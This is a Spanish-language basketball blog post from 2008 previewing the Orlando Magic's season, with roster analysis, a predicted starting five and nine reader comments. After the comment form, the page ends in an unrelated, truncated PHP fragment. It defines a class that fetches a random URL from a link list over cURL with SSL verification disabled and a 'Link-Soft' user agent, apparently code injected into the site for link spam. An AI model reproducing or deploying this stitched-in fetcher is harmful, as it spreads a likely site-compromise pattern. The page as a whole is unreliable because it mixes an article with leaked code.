Orlando Magic: Mismo núcleo, ¿mejor rendimiento?

28 de September de 2008 por txusma

Al poco de fundarse, los Orlando Magic disputaron su primera final de la NBA liderados por unos inconmesurables Shaquille O’Neal y Anfernee Hardaway. 14 años después Dwight Howard y compañía parten con el mismo objetivo y la misma resolución. Tras una temporada exitosa con más de 52 victorias, una victoria en primera ronda de los Playoffs y un muy buen juego en algunos tramos de la temporada toca dar un paso adelante y plantar realmente cara a los grandes equipos del Este.

Este verano los retoques de la plantilla han sido mínimos y se ha mantenido íntegramente el núcleo de la temporada pasada. Keyon Dooling abandonó la franquicia rumbo New Jersey y en su lugar ha llegado un Anthony Johnson que siempre que ha contado con minutos ha realizado buenas actuaciones. Maurice Evans, por su parte, fichó este verano por los Hawks para jugar un rol parecido al que tuvo la pasada temporada en Orlando y en su lugar los Magic se hicieron también con los servicio del francés Mickael Pietrus, ex-warrior, que se convierte en competencia directa de Keith Bogans para el puesto de escolta titular. Pietrus llega a Orlando con ganas de seguir creciendo, algo que según él ya no podía hacer en Golden State. Y la noche del draft el elegido en la posición número 22 fue Courtney Lee, fino escolta que pone aún más difícil las posibilidades que JJ Redick pueda contar con un papel importante en la franquicia.

Por lo tanto el quinteto titular será muy similar, si no idéntico al de la temporada pasada. Dwight Howard seguirá ejerciendo el papel de pívot dominante y estrella del equipo. Su inicio de temporada del año pasado fue modélico y llegó a sonar su nombre en las primeras quinielas para el MVP de la temporada, demostrado así que el trabajo de Pat Ewing estaba dando sus frutos.

Aunque no consiguió mantener ese nivel superlativo toda la temporada no es descabellado considerarlo entre los favoritos para conseguir el premio este año si sigue mejorando su técnica y conserva toda su fuerza.

Pero aunque Howard es a priori el jugador estrella del equipo, no podemos dejar de reseñar el papel importantísimo que jugó Hedo Turkoglu durante casi toda la temporada. Al turco, en contra de lo que pronosticaban muchos agoreros, le sentó genial la llegada de Stan Van Gundy y Rashard Lewis, y ejercició de líder, jugador franquicia, base, tirador, penetrador y hombre decisivo. Desde la teórica posición de ala-pívot ordenó y distribuyó el juego de su equipo y fue el auténtico cerebro y la personificación del entrenador en la pista. Como casi nada ha cambiado en Orlando parece lógico pensar que mantendrá el nível de la temporada pasada y que seguirá siendo pieza clave en estos Magic.

Rashard Lewis por su parte, llegó con la vitola del jugador que le faltaba para completar el puzzle y optar a grandes cosas a la franquicia de Florida. Pero, sin haber realizado una mala temporada, sus números han estado por debajo de lo que se esperaba, posiblemente eclipsado en parte por el gran papel de Turkoglu. Seguirá siendo, evidentemente, el alero titular y, sabiendo todos de lo que es capaz, no debería sorprendernos una mejoría en sus estadísticas después de la primera temporada de adaptación.

Y Jameer Nelson completa el grupo de las posiciones titulares que parecen claras. En la que parecía ser la temporada de su consagracion el pequeño jugador ha dado un paso atrás pero desgraciadamente para él y para la franquicia tampoco hay un jugador en la plantilla que pueda disputarle el puesto. En todo caso haría bien en no despistarse porque si el año pasado jugadores como Carlos Arroyo o Keyon Dooling ya la robaron minutos, un jugador correctísimo como Anthony Johnson podría ponerle en algun apuro.

Es, sin duda, la posición de escolta la que se encuentra más abierta, aunque a priori la competencia se centra en 2 jugadores: Keith Bogans, escolta titular en numerosos partidos de la temporada pasada, y el recién adquirido Mickael Pietrus, ambos jugadores de similares características. Posiblemente Pietrus, un auténtico portento físico y mejor reboteador que su compañero, sea en un principio el elegido.

En el banco, los ya mencionado Anthony Johnson y Keith Bogans seguramente disfrutaran de muchos minutos y serán jugadores importantes durante toda la temporada, pero para el resto le queda tan solo un papel marginal salvo lesiones. Courtney Lee posiblemente dispute los minutos residuales en la posición de escolta, los veteranos Battie y Foyle darán descanso a Dwight Howard y agitarán la toalla con estilo cada vez que éste machaque la canasta contraria, y Brian Cook puede disfrutar de algunos minutos como ala-pívot. Un año más, e incomprensiblemente, JJ Redick no entrará en los planes de Stan Van Gundy.

Sin duda Orlando será esta temporada, uno de los gallitos del Este y podría aprovecharse de un presumible descenso en el rendimiento de Boston y Detroit.

Quinteto titular: Jameer Nelson, Mickael Pietrus, Rashard Lewis, Hedo Turkoglu y Dwight Howard
Sexto hombre: Keith Bogans

Pronóstico: Finalistas del Este

Comenta

9 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Tienen margen de mejora por parte de Nelson y Rashard, pero no es fácil que Turko mantenga ese nivelazo. Habrá que ver si Dwight progresa, si mejora su juego de espaldas al aro y si mete los tiros libres. Yo sigo sin verlos al nivel de finales de conferencia.

      Citar

  2. Carlos dice:
    #2

    Otra vez creo que te has vuelto a pasar.. Celtics son los claros favoritos para ser finalistas en el Este. Los siguientes, sin duda, los cavaliers. Esa debería ser la final de conferencia, y quizás se puedan colar ahí pistons o quien sabe incluso Magics, pero no ganarla (y desde luego no 76ers)

      Citar

  3. planetbasket.net dice:
    #3
  4. Jabho dice:
    #4

    Bueno yo es uno de los equipos en que menos confio porque no creo que mejoren mucho. Como dice Magic lo primero ver si Turko mantiene el nivel del año pasado que no es fácil. Luego que NElson de un paso adelante y que mejoren y mucho la rotación interior….

    En fin que harán PO pero para mi no llegan a 2ª ronda. Veo 4 equipos mejores a Orlando

      Citar

  5. TheDeerHunter dice:
    #5

    Mucho deben de mejorar Orlando o de bajar Detroit o Boston para que lleguen a la final del Este.
    De Detroit… se podría esperar a priori el teórico bajón que se les presupone siempre y que nunca llega a darse… pero Boston??? No termino de entender porqué tanta gente se empeña en menospreciar a los actuales campeones. Yo les sigo teniendo un respeto atroz.

    Sobre la teórica mejora… creo que olvidáis a Dwight Howard como posible factor de mejora. ¿creéis que no tiene margen??? A poco que mantenga su progresión, que añada algo de movimientos al poste, algún recurso técnico por mínimo que sea… debería hacer del este su cortijo particular y desde luego que está en condiciones de hacerlo.
    Todos sabemos qué significa tener un pívot de estas características de tu parte… y luego, claro, Nelson y R.Lewis… que algo tendrán que decir.
    Lo de Turkoglu… pues tampoco hay ningún motivo concreto para pensar que debe de bajar, con lo a gusto que está jugando en Orlando… lo que pasa es que el listón está tan alto…

    En cualquier caso, a priori… no sé si hay 4 equipos superiores a ellos, pero 3 diría que seguro.

      Citar

  6. txusma dice:
    #6

    Evidentemente veo a los Celtics como favoritos para ganar el Este (tampoco claros, que el hambre hace mucho) pero la otra posicion para mi esta muy abierta. Cuando llegaron a Cleveland Ben Wallace, Delonte West y Wally Szcerbiack tb se dijo que los Cavs lo tenian todo para llegar a la final de la NBA y mira, no pudo ser. Este año han mejorado pero ya veremos como acaban siendo los emparejamientos.
    Yo confio en la mejora de Howard y la de Rashard y a q Turkoglu mantiene o en todo caso baja muy poco su nivel. Las adquisiciones de Pietrus y Johnson me parecen ademas muy interesantes.

      Citar

  7. Magic Stick dice:
    #7

    A esta buena previa le falta un nombre, el cual, será, el mejor fichaje de la temporada: Tonie Battie.

    Después de perderse la campaña anterior por la rotura del ligamento del manguito superior del hombro, Battie vuelve para darle solidez a la pintura de los Magic.

    Aunque no es un hombre que marque las diferencias, nos dará la consistencia que nos faltaba al enfrentarnos contra equipos con dos jugadores interiores, y más si cabe aún este año, con la llegada de Brand a los Sixers y la de el otro O´Neal a los Raptors.

    Con Battie en pista, Rashard Lewis pasaría a ocupar su posición natural de 3, posición en la que se desenvuelve mejor y sería Turkoglu el desplazado a la posición de 2, donde ya actuó en algunos momentos de la pasada campaña.

    En cuanto a los fichajes, Mickael Pietrus nos dará más poderío defensivo en el exterior. En cuanto al novato Lee se especula que también juegue de G para convertirse en un combo guard, que, tras la marcha de Keyon Dooling a los Nets, no teníamos un jugador de esas características en el equipo.

    Anthony Johnson dará la experiencia al equipo y disfrutará de minutos ya que Nelson tiene una tendencia a perderse varios partidos durante el año

    El caso de JJ Redick sigue en el aire, si bien es cierto que el trabajo del verano se ha visto reflejado en su musculatura cosa que le ayudará en la defensa, su faceta pendiente para tener minutos.

    Los dos jugadores que completan el roster para el training camp son Jeremy Richardson y Dwayne Jones tienen pocas posibilidades de quedarse, si bien es cierto que Jones tiene más al ser un jugador interior.

      Citar

  8. MagicJohnson32 dice:
    #8

    Buena aportación, Magic Stick, realmente bueno.

    Pero dudo mucho que Battie marque diferencias (colectivamente, claro, porque en lo individual todos sabemos que no lo hará), y más aún después de todo un año lesionado. Os vendrá bien, sin duda, poder contar con él, porque detrás del animalito no había un solo interior medio decente. Pietrus es una buena incorporación pero creo que echaréis de menos a Dooling, uno de los mejores defensores exteriores de la liga.

      Citar

  9. Txusma dice:
    #9

    Q conste que nombro a Battie y a Foyle, aunq es cierto q creo q su aportacion sera casi anecdotica. No creo q Battie vaya a jugar de titular, asi que la mayoria del tiempo Lewis o Turkoglu jugaran de falso 4.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>